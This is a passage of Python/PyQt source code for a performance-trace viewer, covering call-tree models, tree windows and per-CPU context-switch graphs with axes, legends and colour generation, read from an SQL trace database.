self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallTreeLevelTwoItem(self.glb, self.params, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model root item
class CallTreeRootItem(CallGraphLevelItemBase):
def __init__(self, glb, params):
super(CallTreeRootItem, self).__init__(glb, params, 0, None)
self.dbid = 0
self.query_done = True
if_has_calls = ""
if IsSelectable(glb.db, "comms", columns = "has_calls"):
if_has_calls = " WHERE has_calls = " + glb.dbref.TRUE
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms" + if_has_calls)
while query.next():
if not query.value(0):
continue
child_item = CallTreeLevelOneItem(glb, params, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call Tree data model
class CallTreeModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallTreeModel, self).__init__(glb, parent)
def GetRoot(self):
return CallTreeRootItem(self.glb, self.params)
def columnCount(self, parent=None):
if self.params.have_ipc:
return 12
else:
return 7
def columnHeader(self, column):
if self.params.have_ipc:
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Insn Cnt", "Insn Cnt (%)", "Cyc Cnt", "Cyc Cnt (%)", "IPC", "Branch Count ", "Branch Count (%) "]
else:
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
if self.params.have_ipc:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
else:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT calls.id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE calls.id <> 0"
" AND symbols.name" + match +
" ORDER BY comm_id, thread_id, call_time, calls.id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM calls"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Horizontal layout
class HBoxLayout(QHBoxLayout):
def __init__(self, *children):
super(HBoxLayout, self).__init__()
self.layout().setContentsMargins(0, 0, 0, 0)
for child in children:
if child.isWidgetType():
self.layout().addWidget(child)
else:
self.layout().addLayout(child)
# Vertical layout
class VBoxLayout(QVBoxLayout):
def __init__(self, *children):
super(VBoxLayout, self).__init__()
self.layout().setContentsMargins(0, 0, 0, 0)
for child in children:
if child.isWidgetType():
self.layout().addWidget(child)
else:
self.layout().addLayout(child)
# Vertical layout widget
class VBox():
def __init__(self, *children):
self.vbox = QWidget()
self.vbox.setLayout(VBoxLayout(*children))
def Widget(self):
return self.vbox
# Tree window base
class TreeWindowBase(QMdiSubWindow):
def __init__(self, parent=None):
super(TreeWindowBase, self).__init__(parent)
self.model = None
self.find_bar = None
self.view = QTreeView()
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.context_menu = TreeContextMenu(self.view)
def DisplayFound(self, ids):
if not len(ids):
return False
parent = QModelIndex()
for dbid in ids:
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setExpanded(parent, True)
self.view.setCurrentIndex(child)
parent = child
break
if not found:
break
return found
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.model.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, ids):
found = True
if not self.DisplayFound(ids):
found = False
self.find_bar.Idle()
if not found:
self.find_bar.NotFound()
# Context-sensitive call graph window
class CallGraphWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallGraphWindow, self).__init__(parent)
self.model = LookupCreateModel("Context-Sensitive Call Graph", lambda x=glb: CallGraphModel(x))
self.view.setModel(self.model)
for c, w in ((0, 250), (1, 100), (2, 60), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Context-Sensitive Call Graph")
# Call tree window
class CallTreeWindow(TreeWindowBase):
def __init__(self, glb, parent=None, thread_at_time=None):
super(CallTreeWindow, self).__init__(parent)
self.model = LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
self.view.setModel(self.model)
for c, w in ((0, 230), (1, 100), (2, 100), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Call Tree")
if thread_at_time:
self.DisplayThreadAtTime(*thread_at_time)
def DisplayThreadAtTime(self, comm_id, thread_id, time):
parent = QModelIndex()
for dbid in (comm_id, thread_id):
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setExpanded(parent, True)
self.view.setCurrentIndex(child)
parent = child
break
if not found:
return
found = False
while True:
n = self.model.rowCount(parent)
if not n:
return
last_child = None
for row in xrange(n):
self.view.setExpanded(parent, True)
child = self.model.index(row, 0, parent)
child_call_time = child.internalPointer().call_time
if child_call_time < time:
last_child = child
elif child_call_time == time:
self.view.setCurrentIndex(child)
return
elif child_call_time > time:
break
if not last_child:
if not found:
child = self.model.index(0, 0, parent)
self.view.setExpanded(parent, True)
self.view.setCurrentIndex(child)
return
found = True
self.view.setExpanded(parent, True)
self.view.setCurrentIndex(last_child)
parent = last_child
# ExecComm() gets the comm_id of the command string that was set when the process exec'd, i.e. the program name
def ExecComm(db, thread_id, time):
query = QSqlQuery(db)
QueryExec(query, "SELECT comm_threads.comm_id, comms.c_time, comms.exec_flag"
" FROM comm_threads"
" INNER JOIN comms ON comms.id = comm_threads.comm_id"
" WHERE comm_threads.thread_id = " + str(thread_id) +
" ORDER BY comms.c_time, comms.id")
first = None
last = None
while query.next():
if first is None:
first = query.value(0)
if query.value(2) and Decimal(query.value(1)) <= Decimal(time):
last = query.value(0)
if not(last is None):
return last
return first
# Container for (x, y) data
class XY():
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __str__(self):
return "XY({}, {})".format(str(self.x), str(self.y))
# Container for sub-range data
class Subrange():
def __init__(self, lo=0, hi=0):
self.lo = lo
self.hi = hi
def __str__(self):
return "Subrange({}, {})".format(str(self.lo), str(self.hi))
# Graph data region base class
class GraphDataRegion(object):
def __init__(self, key, title = "", ordinal = ""):
self.key = key
self.title = title
self.ordinal = ordinal
# Function to sort GraphDataRegion
def GraphDataRegionOrdinal(data_region):
return data_region.ordinal
# Attributes for a graph region
class GraphRegionAttribute():
def __init__(self, colour):
self.colour = colour
# Switch graph data region represents a task
class SwitchGraphDataRegion(GraphDataRegion):
def __init__(self, key, exec_comm_id, pid, tid, comm, thread_id, comm_id):
super(SwitchGraphDataRegion, self).__init__(key)
self.title = str(pid) + " / " + str(tid) + " " + comm
# Order graph legend within exec comm by pid / tid / time
self.ordinal = str(pid).rjust(16) + str(exec_comm_id).rjust(8) + str(tid).rjust(16)
self.exec_comm_id = exec_comm_id
self.pid = pid
self.tid = tid
self.comm = comm
self.thread_id = thread_id
self.comm_id = comm_id
# Graph data point
class GraphDataPoint():
def __init__(self, data, index, x, y, altx=None, alty=None, hregion=None, vregion=None):
self.data = data
self.index = index
self.x = x
self.y = y
self.altx = altx
self.alty = alty
self.hregion = hregion
self.vregion = vregion
# Graph data (single graph) base class
class GraphData(object):
def __init__(self, collection, xbase=Decimal(0), ybase=Decimal(0)):
self.collection = collection
self.points = []
self.xbase = xbase
self.ybase = ybase
self.title = ""
def AddPoint(self, x, y, altx=None, alty=None, hregion=None, vregion=None):
index = len(self.points)
x = float(Decimal(x) - self.xbase)
y = float(Decimal(y) - self.ybase)
self.points.append(GraphDataPoint(self, index, x, y, altx, alty, hregion, vregion))
def XToData(self, x):
return Decimal(x) + self.xbase
def YToData(self, y):
return Decimal(y) + self.ybase
# Switch graph data (for one CPU)
class SwitchGraphData(GraphData):
def __init__(self, db, collection, cpu, xbase):
super(SwitchGraphData, self).__init__(collection, xbase)
self.cpu = cpu
self.title = "CPU " + str(cpu)
self.SelectSwitches(db)
def SelectComms(self, db, thread_id, last_comm_id, start_time, end_time):
query = QSqlQuery(db)
QueryExec(query, "SELECT id, c_time"
" FROM comms"
" WHERE c_thread_id = " + str(thread_id) +
" AND exec_flag = " + self.collection.glb.dbref.TRUE +
" AND c_time >= " + str(start_time) +
" AND c_time <= " + str(end_time) +
" ORDER BY c_time, id")
while query.next():
comm_id = query.value(0)
if comm_id == last_comm_id:
continue
time = query.value(1)
hregion = self.HRegion(db, thread_id, comm_id, time)
self.AddPoint(time, 1000, None, None, hregion)
def SelectSwitches(self, db):
last_time = None
last_comm_id = None
last_thread_id = None
query = QSqlQuery(db)
QueryExec(query, "SELECT time, thread_out_id, thread_in_id, comm_out_id, comm_in_id, flags"
" FROM context_switches"
" WHERE machine_id = " + str(self.collection.machine_id) +
" AND cpu = " + str(self.cpu) +
" ORDER BY time, id")
while query.next():
flags = int(query.value(5))
if flags & 1:
# Schedule-out: detect and add exec's
if last_thread_id == query.value(1) and last_comm_id is not None and last_comm_id != query.value(3):
self.SelectComms(db, last_thread_id, last_comm_id, last_time, query.value(0))
continue
# Schedule-in: add data point
if len(self.points) == 0:
start_time = self.collection.glb.StartTime(self.collection.machine_id)
hregion = self.HRegion(db, query.value(1), query.value(3), start_time)
self.AddPoint(start_time, 1000, None, None, hregion)
time = query.value(0)
comm_id = query.value(4)
thread_id = query.value(2)
hregion = self.HRegion(db, thread_id, comm_id, time)
self.AddPoint(time, 1000, None, None, hregion)
last_time = time
last_comm_id = comm_id
last_thread_id = thread_id
def NewHRegion(self, db, key, thread_id, comm_id, time):
exec_comm_id = ExecComm(db, thread_id, time)
query = QSqlQuery(db)
QueryExec(query, "SELECT pid, tid FROM threads WHERE id = " + str(thread_id))
if query.next():
pid = query.value(0)
tid = query.value(1)
else:
pid = -1
tid = -1
query = QSqlQuery(db)
QueryExec(query, "SELECT comm FROM comms WHERE id = " + str(comm_id))
if query.next():
comm = query.value(0)
else:
comm = ""
return SwitchGraphDataRegion(key, exec_comm_id, pid, tid, comm, thread_id, comm_id)
def HRegion(self, db, thread_id, comm_id, time):
key = str(thread_id) + ":" + str(comm_id)
hregion = self.collection.LookupHRegion(key)
if hregion is None:
hregion = self.NewHRegion(db, key, thread_id, comm_id, time)
self.collection.AddHRegion(key, hregion)
return hregion
# Graph data collection (multiple related graphs) base class
class GraphDataCollection(object):
def __init__(self, glb):
self.glb = glb
self.data = []
self.hregions = {}
self.xrangelo = None
self.xrangehi = None
self.yrangelo = None
self.yrangehi = None
self.dp = XY(0, 0)
def AddGraphData(self, data):
self.data.append(data)
def LookupHRegion(self, key):
if key in self.hregions:
return self.hregions[key]
return None
def AddHRegion(self, key, hregion):
self.hregions[key] = hregion
# Switch graph data collection (SwitchGraphData for each CPU)
class SwitchGraphDataCollection(GraphDataCollection):
def __init__(self, glb, db, machine_id):
super(SwitchGraphDataCollection, self).__init__(glb)
self.machine_id = machine_id
self.cpus = self.SelectCPUs(db)
self.xrangelo = glb.StartTime(machine_id)
self.xrangehi = glb.FinishTime(machine_id)
self.yrangelo = Decimal(0)
self.yrangehi = Decimal(1000)
for cpu in self.cpus:
self.AddGraphData(SwitchGraphData(db, self, cpu, self.xrangelo))
def SelectCPUs(self, db):
cpus = []
query = QSqlQuery(db)
QueryExec(query, "SELECT DISTINCT cpu"
" FROM context_switches"
" WHERE machine_id = " + str(self.machine_id))
while query.next():
cpus.append(int(query.value(0)))
return sorted(cpus)
# Switch graph data graphics item displays the graphed data
class SwitchGraphDataGraphicsItem(QGraphicsItem):
def __init__(self, data, graph_width, graph_height, attrs, event_handler, parent=None):
super(SwitchGraphDataGraphicsItem, self).__init__(parent)
self.data = data
self.graph_width = graph_width
self.graph_height = graph_height
self.attrs = attrs
self.event_handler = event_handler
self.setAcceptHoverEvents(True)
def boundingRect(self):
return QRectF(0, 0, self.graph_width, self.graph_height)
def PaintPoint(self, painter, last, x):
if not(last is None or last.hregion.pid == 0 or x < self.attrs.subrange.x.lo):
if last.x < self.attrs.subrange.x.lo:
x0 = self.attrs.subrange.x.lo
else:
x0 = last.x
if x > self.attrs.subrange.x.hi:
x1 = self.attrs.subrange.x.hi
else:
x1 = x - 1
x0 = self.attrs.XToPixel(x0)
x1 = self.attrs.XToPixel(x1)
y0 = self.attrs.YToPixel(last.y)
colour = self.attrs.region_attributes[last.hregion.key].colour
width = x1 - x0 + 1
if width < 2:
painter.setPen(colour)
painter.drawLine(x0, self.graph_height - y0, x0, self.graph_height)
else:
painter.fillRect(x0, self.graph_height - y0, width, self.graph_height - 1, colour)
def paint(self, painter, option, widget):
last = None
for point in self.data.points:
self.PaintPoint(painter, last, point.x)
if point.x > self.attrs.subrange.x.hi:
                break
last = point
self.PaintPoint(painter, last, self.attrs.subrange.x.hi + 1)
def BinarySearchPoint(self, target):
lower_pos = 0
higher_pos = len(self.data.points)
while True:
pos = int((lower_pos + higher_pos) / 2)
val = self.data.points[pos].x
if target >= val:
lower_pos = pos
else:
higher_pos = pos
if higher_pos <= lower_pos + 1:
return lower_pos
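    # BinarySearchPoint() returns the index of the last data point whose x is at
    # or before the target (callers ensure target >= points[0].x first)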
def XPixelToData(self, x):
x = self.attrs.PixelToX(x)
if x < self.data.points[0].x:
x = 0
pos = 0
low = True
else:
pos = self.BinarySearchPoint(x)
low = False
return (low, pos, self.data.XToData(x))
def EventToData(self, event):
no_data = (None,) * 4
if len(self.data.points) < 1:
return no_data
x = event.pos().x()
if x < 0:
return no_data
low0, pos0, time_from = self.XPixelToData(x)
low1, pos1, time_to = self.XPixelToData(x + 1)
hregions = set()
hregion_times = []
if not low1:
for i in xrange(pos0, pos1 + 1):
hregion = self.data.points[i].hregion
hregions.add(hregion)
if i == pos0:
time = time_from
else:
time = self.data.XToData(self.data.points[i].x)
hregion_times.append((hregion, time))
return (time_from, time_to, hregions, hregion_times)
def hoverMoveEvent(self, event):
time_from, time_to, hregions, hregion_times = self.EventToData(event)
if time_from is not None:
self.event_handler.PointEvent(self.data.cpu, time_from, time_to, hregions)
def hoverLeaveEvent(self, event):
self.event_handler.NoPointEvent()
def mousePressEvent(self, event):
if event.button() != Qt.RightButton:
super(SwitchGraphDataGraphicsItem, self).mousePressEvent(event)
return
time_from, time_to, hregions, hregion_times = self.EventToData(event)
if hregion_times:
self.event_handler.RightClickEvent(self.data.cpu, hregion_times, event.screenPos())
# X-axis graphics item
class XAxisGraphicsItem(QGraphicsItem):
def __init__(self, width, parent=None):
super(XAxisGraphicsItem, self).__init__(parent)
self.width = width
self.max_mark_sz = 4
self.height = self.max_mark_sz + 1
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def Step(self):
attrs = self.parentItem().attrs
subrange = attrs.subrange.x
t = subrange.hi - subrange.lo
s = (3.0 * t) / self.width
n = 1.0
while s > n:
n = n * 10.0
return n
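    # e.g. for a visible x-range of 10,000,000 ns across 1000 pixels,
    # 3.0 * t / width is 30,000 so Step() returns 100,000 (a mark every 0.1 ms)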
def PaintMarks(self, painter, at_y, lo, hi, step, i):
attrs = self.parentItem().attrs
x = lo
while x <= hi:
xp = attrs.XToPixel(x)
if i % 10:
if i % 5:
sz = 1
else:
sz = 2
else:
sz = self.max_mark_sz
i = 0
painter.drawLine(xp, at_y, xp, at_y + sz)
x += step
i += 1
def paint(self, painter, option, widget):
# Using QPainter::drawLine(int x1, int y1, int x2, int y2) so x2 = width -1
painter.drawLine(0, 0, self.width - 1, 0)
n = self.Step()
attrs = self.parentItem().attrs
subrange = attrs.subrange.x
if subrange.lo:
x_offset = n - (subrange.lo % n)
else:
x_offset = 0.0
x = subrange.lo + x_offset
i = (x / n) % 10
self.PaintMarks(painter, 0, x, subrange.hi, n, i)
def ScaleDimensions(self):
n = self.Step()
attrs = self.parentItem().attrs
lo = attrs.subrange.x.lo
hi = (n * 10.0) + lo
width = attrs.XToPixel(hi)
if width > 500:
width = 0
return (n, lo, hi, width)
def PaintScale(self, painter, at_x, at_y):
n, lo, hi, width = self.ScaleDimensions()
if not width:
return
painter.drawLine(at_x, at_y, at_x + width, at_y)
self.PaintMarks(painter, at_y, lo, hi, n, 0)
def ScaleWidth(self):
n, lo, hi, width = self.ScaleDimensions()
return width
def ScaleHeight(self):
return self.height
def ScaleUnit(self):
return self.Step() * 10
# Scale graphics item base class
class ScaleGraphicsItem(QGraphicsItem):
def __init__(self, axis, parent=None):
super(ScaleGraphicsItem, self).__init__(parent)
self.axis = axis
def boundingRect(self):
scale_width = self.axis.ScaleWidth()
if not scale_width:
return QRectF()
return QRectF(0, 0, self.axis.ScaleWidth() + 100, self.axis.ScaleHeight())
def paint(self, painter, option, widget):
scale_width = self.axis.ScaleWidth()
if not scale_width:
return
self.axis.PaintScale(painter, 0, 5)
x = scale_width + 4
painter.drawText(QPointF(x, 10), self.Text())
def Unit(self):
return self.axis.ScaleUnit()
def Text(self):
return ""
# Switch graph scale graphics item
class SwitchScaleGraphicsItem(ScaleGraphicsItem):
def __init__(self, axis, parent=None):
super(SwitchScaleGraphicsItem, self).__init__(axis, parent)
def Text(self):
unit = self.Unit()
if unit >= 1000000000:
unit = int(unit / 1000000000)
us = "s"
elif unit >= 1000000:
unit = int(unit / 1000000)
us = "ms"
elif unit >= 1000:
unit = int(unit / 1000)
us = "us"
else:
unit = int(unit)
us = "ns"
return " = " + str(unit) + " " + us
# Switch graph graphics item contains graph title, scale, x/y-axis, and the graphed data
class SwitchGraphGraphicsItem(QGraphicsItem):
def __init__(self, collection, data, attrs, event_handler, first, parent=None):
super(SwitchGraphGraphicsItem, self).__init__(parent)
self.collection = collection
self.data = data
self.attrs = attrs
self.event_handler = event_handler
margin = 20
title_width = 50
self.title_graphics = QGraphicsSimpleTextItem(data.title, self)
self.title_graphics.setPos(margin, margin)
graph_width = attrs.XToPixel(attrs.subrange.x.hi) + 1
graph_height = attrs.YToPixel(attrs.subrange.y.hi) + 1
self.graph_origin_x = margin + title_width + margin
self.graph_origin_y = graph_height + margin
x_axis_size = 1
y_axis_size = 1
self.yline = QGraphicsLineItem(0, 0, 0, graph_height, self)
self.x_axis = XAxisGraphicsItem(graph_width, self)
self.x_axis.setPos(self.graph_origin_x, self.graph_origin_y + 1)
if first:
self.scale_item = SwitchScaleGraphicsItem(self.x_axis, self)
self.scale_item.setPos(self.graph_origin_x, self.graph_origin_y + 10)
self.yline.setPos(self.graph_origin_x - y_axis_size, self.graph_origin_y - graph_height)
self.axis_point = QGraphicsLineItem(0, 0, 0, 0, self)
self.axis_point.setPos(self.graph_origin_x - 1, self.graph_origin_y +1)
self.width = self.graph_origin_x + graph_width + margin
self.height = self.graph_origin_y + margin
self.graph = SwitchGraphDataGraphicsItem(data, graph_width, graph_height, attrs, event_handler, self)
self.graph.setPos(self.graph_origin_x, self.graph_origin_y - graph_height)
if parent and 'EnableRubberBand' in dir(parent):
parent.EnableRubberBand(self.graph_origin_x, self.graph_origin_x + graph_width - 1, self)
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def paint(self, painter, option, widget):
pass
def RBXToPixel(self, x):
return self.attrs.PixelToX(x - self.graph_origin_x)
def RBXRangeToPixel(self, x0, x1):
return (self.RBXToPixel(x0), self.RBXToPixel(x1 + 1))
def RBPixelToTime(self, x):
if x < self.data.points[0].x:
return self.data.XToData(0)
return self.data.XToData(x)
def RBEventTimes(self, x0, x1):
x0, x1 = self.RBXRangeToPixel(x0, x1)
time_from = self.RBPixelToTime(x0)
time_to = self.RBPixelToTime(x1)
return (time_from, time_to)
def RBEvent(self, x0, x1):
time_from, time_to = self.RBEventTimes(x0, x1)
self.event_handler.RangeEvent(time_from, time_to)
def RBMoveEvent(self, x0, x1):
if x1 < x0:
x0, x1 = x1, x0
self.RBEvent(x0, x1)
def RBReleaseEvent(self, x0, x1, selection_state):
if x1 < x0:
x0, x1 = x1, x0
x0, x1 = self.RBXRangeToPixel(x0, x1)
self.event_handler.SelectEvent(x0, x1, selection_state)
# Graphics item to draw a vertical bracket (used to highlight "forward" sub-range)
class VerticalBracketGraphicsItem(QGraphicsItem):
def __init__(self, parent=None):
super(VerticalBracketGraphicsItem, self).__init__(parent)
self.width = 0
self.height = 0
self.hide()
def SetSize(self, width, height):
self.width = width + 1
self.height = height + 1
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def paint(self, painter, option, widget):
colour = QColor(255, 255, 0, 32)
painter.fillRect(0, 0, self.width, self.height, colour)
x1 = self.width - 1
y1 = self.height - 1
painter.drawLine(0, 0, x1, 0)
painter.drawLine(0, 0, 0, 3)
painter.drawLine(x1, 0, x1, 3)
painter.drawLine(0, y1, x1, y1)
painter.drawLine(0, y1, 0, y1 - 3)
painter.drawLine(x1, y1, x1, y1 - 3)
# Graphics item to contain graphs arranged vertically
class VertcalGraphSetGraphicsItem(QGraphicsItem):
def __init__(self, collection, attrs, event_handler, child_class, parent=None):
super(VertcalGraphSetGraphicsItem, self).__init__(parent)
self.collection = collection
self.top = 10
self.width = 0
self.height = self.top
self.rubber_band = None
self.rb_enabled = False
first = True
for data in collection.data:
child = child_class(collection, data, attrs, event_handler, first, self)
child.setPos(0, self.height + 1)
rect = child.boundingRect()
if rect.right() > self.width:
self.width = rect.right()
self.height = self.height + rect.bottom() + 1
first = False
self.bracket = VerticalBracketGraphicsItem(self)
def EnableRubberBand(self, xlo, xhi, rb_event_handler):
if self.rb_enabled:
return
self.rb_enabled = True
self.rb_in_view = False
self.setAcceptedMouseButtons(Qt.LeftButton)
self.rb_xlo = xlo
self.rb_xhi = xhi
self.rb_event_handler = rb_event_handler
self.mousePressEvent = self.MousePressEvent
self.mouseMoveEvent = self.MouseMoveEvent
self.mouseReleaseEvent = self.MouseReleaseEvent
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def paint(self, painter, option, widget):
pass
def RubberBandParent(self):
scene = self.scene()
view = scene.views()[0]
viewport = view.viewport()
return viewport
def RubberBandSetGeometry(self, rect):
scene_rectf = self.mapRectToScene(QRectF(rect))
scene = self.scene()
view = scene.views()[0]
poly = view.mapFromScene(scene_rectf)
self.rubber_band.setGeometry(poly.boundingRect())
def SetSelection(self, selection_state):
if self.rubber_band:
if selection_state:
self.RubberBandSetGeometry(selection_state)
self.rubber_band.show()
else:
self.rubber_band.hide()
def SetBracket(self, rect):
if rect:
x, y, width, height = rect.x(), rect.y(), rect.width(), rect.height()
self.bracket.setPos(x, y)
self.bracket.SetSize(width, height)
self.bracket.show()
else:
self.bracket.hide()
def RubberBandX(self, event):
x = event.pos().toPoint().x()
if x < self.rb_xlo:
x = self.rb_xlo
elif x > self.rb_xhi:
x = self.rb_xhi
else:
self.rb_in_view = True
return x
def RubberBandRect(self, x):
if self.rb_origin.x() <= x:
width = x - self.rb_origin.x()
rect = QRect(self.rb_origin, QSize(width, self.height))
else:
width = self.rb_origin.x() - x
top_left = QPoint(self.rb_origin.x() - width, self.rb_origin.y())
rect = QRect(top_left, QSize(width, self.height))
return rect
def MousePressEvent(self, event):
self.rb_in_view = False
x = self.RubberBandX(event)
self.rb_origin = QPoint(x, self.top)
if self.rubber_band is None:
self.rubber_band = QRubberBand(QRubberBand.Rectangle, self.RubberBandParent())
self.RubberBandSetGeometry(QRect(self.rb_origin, QSize(0, self.height)))
if self.rb_in_view:
self.rubber_band.show()
self.rb_event_handler.RBMoveEvent(x, x)
else:
self.rubber_band.hide()
def MouseMoveEvent(self, event):
x = self.RubberBandX(event)
rect = self.RubberBandRect(x)
self.RubberBandSetGeometry(rect)
if self.rb_in_view:
self.rubber_band.show()
self.rb_event_handler.RBMoveEvent(self.rb_origin.x(), x)
def MouseReleaseEvent(self, event):
x = self.RubberBandX(event)
if self.rb_in_view:
selection_state = self.RubberBandRect(x)
else:
selection_state = None
self.rb_event_handler.RBReleaseEvent(self.rb_origin.x(), x, selection_state)
# Switch graph legend data model
class SwitchGraphLegendModel(QAbstractTableModel):
def __init__(self, collection, region_attributes, parent=None):
super(SwitchGraphLegendModel, self).__init__(parent)
self.region_attributes = region_attributes
self.child_items = sorted(collection.hregions.values(), key=GraphDataRegionOrdinal)
self.child_count = len(self.child_items)
self.highlight_set = set()
self.column_headers = ("pid", "tid", "comm")
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def data(self, index, role):
if role == Qt.BackgroundRole:
child = self.child_items[index.row()]
if child in self.highlight_set:
return self.region_attributes[child.key].colour
return None
if role == Qt.ForegroundRole:
child = self.child_items[index.row()]
if child in self.highlight_set:
return QColor(255, 255, 255)
return self.region_attributes[child.key].colour
if role != Qt.DisplayRole:
return None
hregion = self.child_items[index.row()]
col = index.column()
if col == 0:
return hregion.pid
if col == 1:
return hregion.tid
if col == 2:
return hregion.comm
return None
def SetHighlight(self, row, set_highlight):
child = self.child_items[row]
top_left = self.createIndex(row, 0, child)
bottom_right = self.createIndex(row, len(self.column_headers) - 1, child)
self.dataChanged.emit(top_left, bottom_right)
def Highlight(self, highlight_set):
for row in xrange(self.child_count):
child = self.child_items[row]
if child in self.highlight_set:
if child not in highlight_set:
self.SetHighlight(row, False)
elif child in highlight_set:
self.SetHighlight(row, True)
self.highlight_set = highlight_set
# Switch graph legend is a table
class SwitchGraphLegend(QWidget):
def __init__(self, collection, region_attributes, parent=None):
super(SwitchGraphLegend, self).__init__(parent)
self.data_model = SwitchGraphLegendModel(collection, region_attributes)
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.view.resizeColumnsToContents()
self.view.resizeRowsToContents()
self.vbox = VBoxLayout(self.view)
self.setLayout(self.vbox)
sz1 = self.view.columnWidth(0) + self.view.columnWidth(1) + self.view.columnWidth(2) + 2
sz1 = sz1 + self.view.verticalScrollBar().sizeHint().width()
self.saved_size = sz1
def resizeEvent(self, event):
self.saved_size = self.size().width()
super(SwitchGraphLegend, self).resizeEvent(event)
def Highlight(self, highlight_set):
self.data_model.Highlight(highlight_set)
self.update()
def changeEvent(self, event):
if event.type() == QEvent.FontChange:
self.view.resizeRowsToContents()
self.view.resizeColumnsToContents()
# Need to resize rows again after column resize
self.view.resizeRowsToContents()
super(SwitchGraphLegend, self).changeEvent(event)
# Random colour generation
def RGBColourTooLight(r, g, b):
if g > 230:
return True
if g <= 160:
return False
if r <= 180 and g <= 180:
return False
if r < 60:
return False
return True
def GenerateColours(x):
cs = [0]
for i in xrange(1, x):
cs.append(int((255.0 / i) + 0.5))
colours = []
for r in cs:
for g in cs:
for b in cs:
# Exclude black and colours that look too light against a white background
if (r, g, b) == (0, 0, 0) or RGBColourTooLight(r, g, b):
continue
colours.append(QColor(r, g, b))
return colours
def GenerateNColours(n):
for x in xrange(2, n + 2):
colours = GenerateColours(x)
if len(colours) >= n:
return colours
return []
def GenerateNRandomColours(n, seed):
colours = GenerateNColours(n)
random.seed(seed)
random.shuffle(colours)
return colours
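# Illustrative note, not part of the original logic: GenerateColours(2) uses the
# channel values cs = [0, 255], so candidates are the corners of the RGB cube; black
# and everything RGBColourTooLight() rejects (e.g. all g == 255 entries) are dropped,
# leaving colours such as (0, 0, 255), (255, 0, 0) and (255, 0, 255).
# GenerateNColours() simply retries with more channel steps until at least n survive,
# and GenerateNRandomColours() shuffles them with a fixed seed for reproducibility.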
# Graph attributes, in particular the scale and subrange that change when zooming
class GraphAttributes():
def __init__(self, scale, subrange, region_attributes, dp):
self.scale = scale
self.subrange = subrange
self.region_attributes = region_attributes
# Rounding avoids errors due to finite floating point precision
self.dp = dp # data decimal places
self.Update()
def XToPixel(self, x):
return int(round((x - self.subrange.x.lo) * self.scale.x, self.pdp.x))
def YToPixel(self, y):
return int(round((y - self.subrange.y.lo) * self.scale.y, self.pdp.y))
def PixelToXRounded(self, px):
return round((round(px, 0) / self.scale.x), self.dp.x) + self.subrange.x.lo
def PixelToYRounded(self, py):
return round((round(py, 0) / self.scale.y), self.dp.y) + self.subrange.y.lo
def PixelToX(self, px):
x = self.PixelToXRounded(px)
if self.pdp.x == 0:
rt = self.XToPixel(x)
if rt > px:
return x - 1
return x
def PixelToY(self, py):
y = self.PixelToYRounded(py)
if self.pdp.y == 0:
rt = self.YToPixel(y)
if rt > py:
